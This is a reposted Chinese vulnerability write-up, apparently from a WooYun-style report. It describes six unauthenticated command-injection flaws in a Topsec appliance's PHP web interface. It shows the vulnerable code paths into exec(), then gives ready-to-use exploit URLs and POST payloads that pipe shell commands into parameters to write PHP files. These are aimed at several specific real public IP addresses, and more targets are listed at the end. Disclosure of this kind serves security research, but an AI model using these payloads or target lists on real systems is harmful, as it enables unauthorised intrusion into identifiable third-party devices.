change lan.php lanid,天融信某系统前台无需登录命令执行六处

于 2021-03-12 15:39:17 发布
阅读量148 收藏
点赞数
文章标签: change lan.php lanid

bytecache_run_action.php:code 区域<?php

require_once dirname(__FILE__)."/../common/commandWrapper.inc";

require_once dirname(__FILE__)."/../common/UciUtil.inc";

$action = $_GET['action'];

$engine = $_GET['engine'];

$ipfilter= $_GET['ipfilter'];

if($action=="1"){

$ipFilterArray = split("[/.]",$ipfilter);

for($m =0 ;$m<4 ;$m++){

if($ipFilterArray[$m]>15){

$ipFilterArray[$m]=dechex($ipFilterArray[$m]);

}else{

$ipFilterArray[$m]="0".dechex($ipFilterArray[$m]);

}

}

$ipFilterNum =$ipFilterArray[0].$ipFilterArray[1].$ipFilterArray[2].$ipFilterArray[3];

UciUtil::setValue('appex', 'sys', 'BCDebugEngineId',$engine);

UciUtil::setValue('appex', 'sys', 'BCDebugIpFilter',$ipfilter);

startByteCacheDebug($engine,$ipFilterNum);

}else{

$engine = UciUtil::getValue('appex', 'sys', 'BCDebugEngineId');

stopByteCacheDebug($engine);

}

?>

第一处:

setValue

跟进去:code 区域public static function setValue($package, $config, $option, $value){

self::getUciDao()->set($package, $config, $option, $value);

}

再跟进去:code 区域public function setConfig($package,$config,$value){

$cmd = UCI_CMD." set ".$package.".".$config."=".$value;

exec($cmd);

}

说明value可控

第二处:

startByteCacheDebug($engine,$ipFilterNum);

跟进去:code 区域function startByteCacheDebug($engine,$ipFilter){

$command = "/tmp/appexcfg/bin/apxdebug.sh start "." ".$engine." ".$ipFilter." >/dev/null &";

execute($command);

}

第三处:

当action 不是1的时候

stopByteCacheDebug($engine);

跟进去:code 区域function stopByteCacheDebug($engine){

$command = "/tmp/appexcfg/bin/apxdebug.sh stop "." ".$engine." & ";

execute($command);

//echo $command;

}

证明一处即可:

http://218.206.217.19:8080/acc/debug/bytecache_run_action.php?action=1&engine= | echo wooyun > a.php | &ipfilter=10

访问:

http://218.206.217.19:8080/acc/debug/a.php

第四处:

change_lan.phpcode 区域$lanID = 'En';

$refLink = $_SERVER['HTTP_REFERER'];

if(empty($refLink)){

$refLink = "/index.php";

}

$refLink = str_replace("?error=1", "", $refLink);

if(array_key_exists('LanID',$_REQUEST))

{

$lanID = $_REQUEST["LanID"];

$appexSystemDao = new AppexSystemDao();

$appexSystemDao->setAppexSystemConfigItemValue(LANGUAGE_ID_FIELD,$lanID);

$appexSystemDao->commit();

session_start();

跟进setAppexSystemConfigItemValue:code 区域public function setAppexSystemConfigItemValue($option,$value){

parent::set(UCI_APPEX,"sys",$option,$value);

}

再跟进;code 区域public function set($package,$config,$option,$value){

$cmd = UCI_CMD." set ".$package.".".$config.".".$option."='".$value."'";

exec($cmd);

}

http://61.148.24.182:8080/change_lan.php

postdata:

LanID=1' | echo ' wooyun' > a.php | '

imgpxy.php?url=gpj.7ac144b58d578519a60e1abe37a0102c8000c5503c486743b96df33dae0882ced08d8199688f0392741de9696047fc6f8ec42b757f48c659c2ac5828e0843b6120610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

第五处:

enable_tool_debug.php:code 区域<?php

require_once dirname(__FILE__)."/../common/commandWrapper.inc";

error_reporting(E_ALL ^ E_WARNING ^ E_NOTICE);

$val = $_GET['val'];

$tool = $_GET['tool'];

$par = $_GET['par'];

runTool($val,$tool,$par);

?>

runTool:code 区域function runTool($val,$tool,$par){

if($val=="0"){

UciUtil::setValue('system', 'runtool', 'tool', $tool);

UciUtil::setValue('system', 'runtool', 'parameter', $par);

UciUtil::commit('system');

if($tool=="1"){

exec('ping '.$par.'>/tmp/tool_result &');

}else if($tool=="2"){

exec('traceroute '.$par.'>/tmp/tool_result &');

}

}else if($val=="1"){

$tool=UciUtil::getValue('system', 'runtool', 'tool');

if($tool=="1"){

exec('killall ping ');

}else if($tool=="2"){

exec('killall traceroute ');

}

UciUtil::setValue('system', 'runtool', 'tool', '');

UciUtil::setValue('system', 'runtool', 'parameter', '');

UciUtil::commit('system');

exec('echo "">/tmp/tool_result');

}

http://61.54.222.33:8080/acc/tools/enable_tool_debug.php?val=0&tool=1&par=172.0.0.1' | echo wooyun > a.php | '

imgpxy.php?url=gpj.591d2d019dd6c92568b403c7b12f93d0d1146125f10aae249aa90ecbe5706e6107423b7a46056926da50018af82651648ec42b757f48c659c2ac5828e0843b6120610ccdd32e94fe08df6bcd1a81088a37e38ccf4700970a34e208e46eadc51b%2Fpp%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

getMacAddr.php:code 区域<?php

include_once dirname(__FILE__).'/../common/commandWrapper.inc';

$tmpeth = $_GET['eth'];

$tmpmacAddr = strtoupper(getMacAddrFromIfName($tmpeth));

echo '       ';

?>

跟进getMacAddrFromIfNamecode 区域function getMacAddrFromIfName($ifName){

$mac = execute('cat /sys/class/net/' . trim($ifName) . '/address')->get('output');

if($mac != null && $mac != '')

return $mac[0];

else

return '';

}

http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo wooyun > c.php |

访问http://218.206.217.19:8080/acc/network/c.php 即可

http://61.148.24.182:8080/

http://61.54.222.39:8080/

http://61.148.24.182:8080

http://61.54.222.33:8080

weixin_31981135
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值